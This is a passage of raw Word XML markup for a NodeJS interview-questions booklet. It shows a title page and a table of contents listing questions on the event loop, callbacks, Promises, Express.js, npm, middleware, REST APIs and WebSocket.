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13A47" w14:textId="77777777" w:rsidR="002A47A2" w:rsidRPr="00DA2F32" w:rsidRDefault="002A47A2" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="TOCHeading"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:kern w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-IN" w:bidi="mr-IN"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EB517E6" w14:textId="77777777" w:rsidR="007F2B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="007F2B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C8741E1" w14:textId="77777777" w:rsidR="007F2B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="007F2B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="679FB475" w14:textId="77777777" w:rsidR="007F2B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="007F2B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B64A833" w14:textId="77777777" w:rsidR="007F2B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="007F2B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11DE4909" w14:textId="77777777" w:rsidR="007F2B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="007F2B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22803B25" w14:textId="77777777" w:rsidR="007F2B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="007F2B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D2AE313" w14:textId="77777777" w:rsidR="007F2B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="007F2B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="066BB7A6" w14:textId="77777777" w:rsidR="007F2B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="007F2B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="381186ED" w14:textId="77777777" w:rsidR="002A47A2" w:rsidRPr="00DA2F32" w:rsidRDefault="002A47A2" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00075ACC" w14:textId="77777777" w:rsidR="00D66BA9" w:rsidRDefault="00D66BA9" w:rsidP="00D66BA9">
      <w:pPr>
        <w:pStyle w:val="TOCHeading"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:kern w:val="2"/>
          <w:sz w:val="220"/>
          <w:szCs w:val="220"/>
          <w:lang w:val="en-IN" w:bidi="mr-IN"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="484787BD" w14:textId="0CF076B9" w:rsidR="00B253E8" w:rsidRPr="00D66BA9" w:rsidRDefault="00B253E8" w:rsidP="00D66BA9">
      <w:pPr>
        <w:pStyle w:val="TOCHeading"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="220"/>
          <w:szCs w:val="220"/>
          <w:lang w:val="en-IN" w:bidi="mr-IN"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D66BA9">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:kern w:val="2"/>
          <w:sz w:val="220"/>
          <w:szCs w:val="220"/>
          <w:lang w:val="en-IN" w:bidi="mr-IN"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>NodeJS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D66BA9">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="220"/>
          <w:szCs w:val="220"/>
          <w:lang w:val="en-IN" w:bidi="mr-IN"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:id w:val="1822079120"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="3841843D" w14:textId="4ACA2703" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
          <w:pPr>
            <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00DA2F32">
            <w:rPr>
              <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="12940234" w14:textId="44665B4A" w:rsidR="00593FEF" w:rsidRPr="00DA2F32" w:rsidRDefault="00C4764B" w:rsidP="009E0607">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10314"/>
            </w:tabs>
            <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
              <w:noProof/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00DA2F32">
            <w:rPr>
              <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00DA2F32">
            <w:rPr>
              <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-2" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00DA2F32">
            <w:rPr>
              <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc178383183" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>interview questions for freshers and juniors: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_Toc178383183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w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5325343F" w14:textId="544C6EC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84" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q1. What is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_Toc178383184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w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="555226EF" w14:textId="7F19132A"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85" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q2. How does Node.js differ from other server-side technologies?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_Toc178383185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w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4BAC74B1" w14:textId="7C22DFD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86" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q3. What is an event loop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_Toc178383186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w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32058A49" w14:textId="3DAA779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87" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q4. What is a callback in Node.js? Can you provide an example?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_Toc178383187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w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1996E026" w14:textId="5DA82AD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88" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q5. What is a Promise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_Toc178383188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9</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4C21CC2C" w14:textId="2CBE3D9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89" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q6. What is the difference between synchronous and asynchronous programming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_Toc178383189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10</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="47A2A0EE" w14:textId="1DDE7B2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0" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q7. What is a module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10</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4504A859" w14:textId="4F7D80D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1" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q8. What is the difference between require and import statements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10</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5EBB28A9" w14:textId="7A4A3B7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2" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q9. What is Express.js?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w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4D13BC6D" w14:textId="247047E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3" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q10. How do you install packages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w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0930840F" w14:textId="6BE729F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4" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q11. What is NPM, and how does it work?</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w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2546DA7D" w14:textId="049DF3B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5" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q12. What is the difference between npm and npx?</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w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A38B93D" w14:textId="2A0C4F1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6" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q13. How to handle errors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w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5D272C1B" w14:textId="22AA229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7" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q14. What is middleware in Express.js?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w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="42D3E492" w14:textId="233DC118"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8" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q15. How do you handle file uploads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w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="55F489EF" w14:textId="632B47C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199" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q16. What is RESTful API, and how to create it using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_Toc178383199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18</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="215C67F3" w14:textId="18C1852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00" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q17. How do you implement authentication and authorization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20</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="710C8BBF" w14:textId="297859CA"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01" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q18. What is WebSocket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22</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="095A209E" w14:textId="3CCF580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02" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q19. What is the difference between Node.js and browser JavaScript?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24</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61A1F52F" w14:textId="7F0575A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03" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Q20. Can you give an example of a Node.js project you have worked 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25</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1D47F739" w14:textId="2FF5C835"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04" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>intermediate, mid-level developers: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25</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
